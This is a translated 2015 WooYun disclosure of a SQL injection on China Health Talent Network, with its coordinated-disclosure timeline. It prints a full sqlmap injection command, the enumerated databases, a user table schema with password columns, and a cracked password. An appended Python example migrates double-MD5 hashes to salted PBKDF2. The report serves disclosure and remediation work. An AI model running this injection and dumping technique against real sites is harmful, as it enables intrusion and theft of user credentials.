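Vulnerability summary

Bug ID: wooyun-2015-0136575

Title: A POST injection somewhere on China Health Talent Network (中国卫生人才网)

Vendor: China Health Talent Network (中国卫生人才网)

Author: 冷白开。

Submitted: 2015-08-27 11:19

Fixed: 2015-10-14 02:24

Published: 2015-10-14 02:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]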

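Vulnerability details

Disclosure status:

2015-08-27: Details sent to the vendor; awaiting vendor handling
2015-08-30: CNCERT (National Internet Emergency Center) has not yet been able to reach the organization concerned; details disclosed only to the notifying organizations
2015-09-09: Details disclosed to core white hats and experts in related fields
2015-09-19: Details disclosed to regular white hats
2015-09-29: Details disclosed to intern white hats
2015-10-14: Details disclosed to the public

Brief description:

One wild POST injection found somewhere on China Health Talent Network (中国卫生人才网)

Detailed description:

Injection command: sqlmap.py -u "http://**.**.**.**/rcjl/outersearchPositionAction.do" --data "radiobutton=radiobutton1&image=88952634&image=%EF%BF%BD%DF%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&select=88952634&select2=88952634&select3=88952634&dwmc=--%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%B5%A5%CE%BB%2F%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD--" --dbs

The database contents were enumerated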

Dumped a little data to prove the impact; there are too many users, so I stopped after pulling just a small part

available databases [9]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWTES
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] UNIPORTAL
[*] WMSYS
Database: UNIPORTAL
[1 table]
+---------+
| UP_USER |
+---------+
Database: UNIPORTAL
Table: UP_USER
[5 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| UPUS_EMAIL | VARCHAR2 |
| UPUS_ID | VARCHAR2 |
| UPUS_NAME | VARCHAR2 |
| UPUS_PASSWORD | VARCHAR2 |
| UPUS_REGISTER_TIME | DATE |
+--------------------+----------+
Database: UNIPORTAL
Table: UP_USER
[111 entries]

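The passwords are MD5 passwords encrypted twice; they have to be decrypted twice to recover them. The first password ultimately turns out to be 888888

Proof of vulnerability:

As above

Fix:

You know what to do

Copyright notice: please credit the source when reposting: 冷白开。@WooYun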
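
The report states that the stored passwords are MD5 applied twice. As an added example (not part of the original report or the site's code), here is one way to retire such hashes: wrap each stored digest in salted PBKDF2 offline, then re-hash the real password at the next successful login. The hex encoding of the inner digest, the record format, the iteration count and all function names are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed PBKDF2-HMAC-SHA256 work factor

def legacy_double_md5(password: str) -> str:
    # Unsalted MD5 applied twice, as the report describes. Assumption: the
    # inner digest is hex-encoded before the second pass.
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5(inner.encode("ascii")).hexdigest()

def pbkdf2_record(secret: str, scheme: str = "pbkdf2") -> str:
    # Hypothetical record format: scheme$iterations$salt_hex$key_hex
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"), salt, ITERATIONS)
    return f"{scheme}${ITERATIONS}${salt.hex()}${key.hex()}"

def wrap_legacy(stored_digest: str) -> str:
    # Offline migration: protect an existing digest without the password.
    return pbkdf2_record(stored_digest.lower(), scheme="pbkdf2-md5md5")

def verify(password: str, record: str) -> bool:
    if "$" not in record:  # bare legacy digest, not yet migrated
        return hmac.compare_digest(legacy_double_md5(password), record.lower())
    scheme, iterations, salt_hex, key_hex = record.split("$")
    secret = legacy_double_md5(password) if scheme == "pbkdf2-md5md5" else password
    key = hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"),
                              bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(key.hex(), key_hex)

def login_and_upgrade(password: str, record: str):
    # Returns (ok, record_to_store); a successful login on an old record is
    # re-hashed from the real password so MD5 drops out of the chain.
    if not verify(password, record):
        return False, record
    if not record.startswith("pbkdf2$"):
        record = pbkdf2_record(password)
    return True, record

if __name__ == "__main__":
    pw = "constructed-sample-pass"  # constructed sample, not from the page
    old = legacy_double_md5(pw)
    print(old == legacy_double_md5(pw))          # same password, same digest
    print(wrap_legacy(old) != wrap_legacy(old))  # per-record salt differs
    print(login_and_upgrade(pw, wrap_legacy(old))[0])
```

Because the legacy scheme is unsalted, every account with the same password shares one digest; the wrapped and upgraded records differ per account even for identical passwords.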


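Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-08-30 02:22

Vendor reply:

CNVD confirmed and reproduced the reported issue, and CNVD has notified the website's operations staff directly.

Latest status:

None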